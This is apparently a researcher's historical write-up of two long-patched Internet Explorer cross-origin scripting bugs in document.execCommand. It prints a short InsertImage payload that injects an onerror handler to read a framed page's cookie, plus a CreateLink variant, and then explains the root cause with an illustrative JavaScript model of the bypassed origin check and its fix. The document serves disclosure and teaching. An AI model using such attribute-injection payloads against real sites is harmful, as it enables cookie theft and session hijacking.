Two document.execCommand variants could be used to inject content or create links in the context of a cross-origin IFrame. The InsertImage variant worked by placing a contentEditable IFrame on an attacker page; the CreateLink variant worked in a post-patch scenario where focus was in a cross-domain IFrame.
InsertImage UXSS
<div contenteditable="true">
<iframe src="I_SHOULD_BE_IN_A_DIFFERENT_DOMAIN.html"></iframe>
</div>
document.execCommand("InsertImage", null, '1" onerror="alert(document.cookie)');
CreateLink Variant (Post-Patch)
// Focus must be inside a cross-domain IFrame
range.execCommand('CreateLink', true);
A call stack analysis (preserved in readme.txt) showed that CAutoRange::Exec reached the command handler without passing through CDoc::ExecHelper, which contained the cross-origin protection. The InsertImage path injected an onerror attribute that executed in the IFrame’s context, reading its cookie.
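The root cause described above is a design flaw rather than a parsing bug: the cross-origin check lived in one entry point (CDoc::ExecHelper) while a second entry point (CAutoRange::Exec) reached the same command handler without it. The following is an added illustration, not MSHTML code and not from the original post; the names docExec, rangeExec, commandHandler, guardedHandler and the origins used are hypothetical. It models the two call paths over a toy document, shows why a check placed at one caller is bypassed by the other, and contrasts it with the fix of enforcing the check in the shared handler so every path is covered.

```javascript
// Added illustration of the call-path bypass (hypothetical model, not MSHTML).
// Two entry points dispatch to one command handler. In the vulnerable layout
// the origin check guards only one caller; in the fixed layout it sits in the
// shared handler, so no caller can reach the mutation without it.

function sameOrigin(a, b) {
  return a === b;
}

// The command handler mutates the target document's markup (toy document:
// an object with an origin and an html string).
function commandHandler(targetDoc, command, value) {
  if (command === 'InsertImage') {
    targetDoc.html += '<img src="' + value + '">';
  } else if (command === 'CreateLink') {
    targetDoc.html += '<a href="' + value + '"></a>';
  } else {
    throw new Error('unsupported command: ' + command);
  }
  return targetDoc.html;
}

// Vulnerable layout: the check is performed by one caller (the document
// entry point) but the range entry point calls the handler directly.
const vulnerable = {
  docExec(callerOrigin, targetDoc, command, value) {
    if (!sameOrigin(callerOrigin, targetDoc.origin)) {
      throw new Error('cross-origin exec blocked');
    }
    return commandHandler(targetDoc, command, value);
  },
  rangeExec(callerOrigin, targetDoc, command, value) {
    // No origin check on this path: this is the bypass.
    return commandHandler(targetDoc, command, value);
  },
};

// Fixed layout: the check is inside the only function that can mutate the
// document, so every entry point inherits it.
function guardedHandler(callerOrigin, targetDoc, command, value) {
  if (!sameOrigin(callerOrigin, targetDoc.origin)) {
    throw new Error('cross-origin exec blocked');
  }
  return commandHandler(targetDoc, command, value);
}
const fixed = {
  docExec: guardedHandler,
  rangeExec: guardedHandler,
};

// Helper used to exercise a layout: returns 'mutated' when the command ran
// against the target and 'blocked' when the origin check refused it.
function attempt(api, entry, callerOrigin, targetDoc, command, value) {
  try {
    api[entry](callerOrigin, targetDoc, command, value);
    return 'mutated';
  } catch (e) {
    return 'blocked';
  }
}

// Constructed sample target: a framed document from another origin.
function makeFrame() {
  return { origin: 'https://framed.example', html: '' };
}

const ATTACKER = 'https://top.example';
const SAME = 'https://framed.example';

// Stand-alone run: prints the outcome of each path under each layout.
console.log('vulnerable docExec  :', attempt(vulnerable, 'docExec', ATTACKER, makeFrame(), 'InsertImage', 'x.png'));
console.log('vulnerable rangeExec:', attempt(vulnerable, 'rangeExec', ATTACKER, makeFrame(), 'CreateLink', 'x'));
console.log('fixed rangeExec     :', attempt(fixed, 'rangeExec', ATTACKER, makeFrame(), 'CreateLink', 'x'));
console.log('fixed same-origin   :', attempt(fixed, 'rangeExec', SAME, makeFrame(), 'CreateLink', 'x'));
```

The point for reviewers of any command-dispatch design is the same one the call stack exposed: an authorization check belongs in the function that performs the privileged action (or a single mandatory gate in front of it), not in one of several callers, because a new or overlooked caller silently bypasses it.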
Found during my years at Microsoft (2006–2014). These bugs were patched long ago — shared here as a historical record for learning purposes.